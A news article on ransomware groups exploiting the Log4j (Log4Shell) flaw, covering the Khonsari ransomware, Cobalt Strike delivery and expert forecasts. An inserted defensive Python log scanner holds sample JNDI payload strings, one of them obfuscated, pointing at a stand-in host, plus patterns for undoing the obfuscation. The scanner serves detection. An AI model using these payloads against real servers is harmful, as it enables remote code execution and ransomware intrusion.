More hints that ransomware groups eye the Log4j vulnerability


Researchers see threat actors use Log4j vulnerability to deploy ransomware, signaling grim weeks ahead.

Last week, disclosure of the Log4j vulnerability (dubbed Log4Shell) got pundits speaking of a Fukushima moment for cybersecurity.

Fears run high because the vulnerability in the widely used Java-based logging library is easy to exploit for remote code execution (RCE).

Exploits for Log4j started circulating on the web late last week. Researchers at BitDefender soon reported the first cases of the Log4j vulnerability being used to deploy ransomware.

BitDefender's Martin Zugec spotted an attempt to deploy a novel Khonsari ransomware. The researchers named the ransomware based on the extension used on the encrypted files.

An analysis of the Khonsari ransomware by Matt Muir, a security researcher at Cado Security, shows a previously unseen strain of malware that targets Windows servers.

According to Muir, the ransomware weighs in at a mere 12 KB and contains only the most basic functionality needed to carry out the objective.

"Its size and simplicity is also a strength, however – at the time we ran the malware dynamically, it wasn't detected by the system's built-in antivirus," Muir writes.

Opportunistic attempt

The simplicity of the sample might also signal an attempted test of ransomware deployment.

Researchers have noted that the ransom note the attackers deployed includes dubious contact details for the supposed perpetrators, pointing to a person with no apparent connection to infosec or the cyber underworld.

According to Brett Callow, a ransomware expert and threat analyst at Emsisoft, the newly found ransomware might not be too serious.

"Khonsari is very basic, skid-level ransomware that references a person in its note and was quite possibly created as a malicious prank," Callow wrote CyberNews in an email.

Ransomware negotiation

An attempt to abuse a highly publicized vulnerability to deploy ransomware seems a little bit opportunistic, Muir suggests, yet there's little doubt of malicious intent.

"I think the threat actor almost certainly intended to infect some users with the ransomware, but the fact that the payload has changed does suggest that they were trying to see just how vulnerable people are to the exploit and whether or not it could be used to deploy malware," Muir explained in an email.

There are likely operational reasons why we're not seeing targeted ransomware attacks abusing the Log4j vulnerability. For example, ransomware groups tend to stay in the infected network for weeks before striking.

"For targeted ransomware - we typically see a two-week "incubation period" whilst after attackers initially enter a network, before they have spread and gained sufficient access to deploy ransomware across the whole network. So we may see more impact in the coming days and weeks," Chris Doman, co-founder and CTO of Cado Security, told CyberNews.

The calm before the storm

More worryingly, Microsoft has already noted activity in which perpetrators tried to deliver Cobalt Strike, a remote access tool, via Log4j. Ransomware gangs often employ this tactic.

Nation-state actors from China, Iran, North Korea, and Turkey have been noted to scour for ways to exploit the vulnerability in the wild.

Microsoft also claims to have observed the Iranian actor Phosphorus, a group that has been deploying ransomware, acquiring and modifying the Log4j exploit.

MSTIC and the Microsoft 365 Defender team have also taken note of initial access brokers using Log4j to gain footholds in target networks. Such threat actors are an integral part of the ransomware ecosystem: they sell access to gangs looking for extortion opportunities.

"There is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability. We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on," Sean Gallagher, a senior threat researcher at Sophos, claims.

According to Callow, the race to leverage Log4j has only begun. The loot is ripe for the taking until all systems are patched, meaning there might be a spike in illicit activity in the coming weeks.

"Threat actors will now be in a race to leverage Log4j before patches are deployed, and some will likely be banking access for later use - meaning we could see a spike in Log4j-related security incidents, including ransomware incidents, in the coming weeks," Callow claims.

Golden age

The Log4j vulnerability in the open-source logging utility was first discovered in connection with the well-known game Minecraft. Sites serving the game's users warned that attackers could run malicious code on servers running the Java edition of the game by manipulating log messages.

Log4j is incorporated into widely used Apache-related frameworks, which means the vulnerability's reach may be unlike anything seen before.
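A defender-side illustration of the mechanism described above, added here and not part of the original article: the exploit string is a Log4j lookup (`${jndi:...}`) embedded in attacker-controlled text that later gets logged, so scanning logs for it has to undo the nesting tricks that Log4j's own lookups allow (for instance `${lower:j}` or `${::-j}` in place of the letter `j`). The log lines and the 203.0.113.x addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the article); 203.0.113.0/24 is a documentation range.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:rmi://203.0.113.7/x}"',
    '10.0.0.3 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "-"',
]

# Innermost Log4j lookup forms that are nested to hide the literal "jndi" token:
#   ${lower:j} / ${upper:j}  -> "j"
#   ${env:UNSET:-j} / ${::-j} -> "j"   (the ":-default" form yields the default)
INNER_LOOKUPS = [
    re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*?)\s*\}", re.I),
    re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"),
]
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then resolve innermost lookups repeatedly until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = text
        for pattern in INNER_LOOKUPS:
            resolved = pattern.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is peeled away."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines) -> list:
    """Return the indices of lines that should be triaged."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"line {i}: {SAMPLE_LOGS[i]}")
```

Benign lookups such as `${date:yyyy}` are left alone, so the check flags only the JNDI form rather than every `${` in a log.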

Companies with servers confirmed to be vulnerable to the Log4Shell attack include Apple, Amazon, Twitter, Steam, Baidu, NetEase, Tencent, and Elastic, with likely hundreds if not thousands more.

Cyberattacks are increasing in scale, sophistication, and scope. The last 12 months were rife with major high-profile cyberattacks, such as the SolarWinds hack and the attacks against the Colonial Pipeline, meat processing company JBS, and software firm Kaseya.

Pundits talk of a ransomware gold rush, with the number of attacks increasing over 90% in the first half of 2021 alone.

The prevalence of ransomware has forced governments to take multilateral action against the threat. A combined effort likely helped push the infamous REvil and BlackMatter cartels offline and led to the arrest of Cl0p ransomware cartel members.

Gangs, however, either rebrand or form new groups. Most recently, LockBit 2.0 was the most active ransomware group with a whopping list of 203 victims in Q3 of 2021 alone.

An average data breach now costs victims $4.24 million per incident, the highest in 17 years. By comparison, the average cost stood at $3.86 million per incident last year, making the latest figure a 10% increase.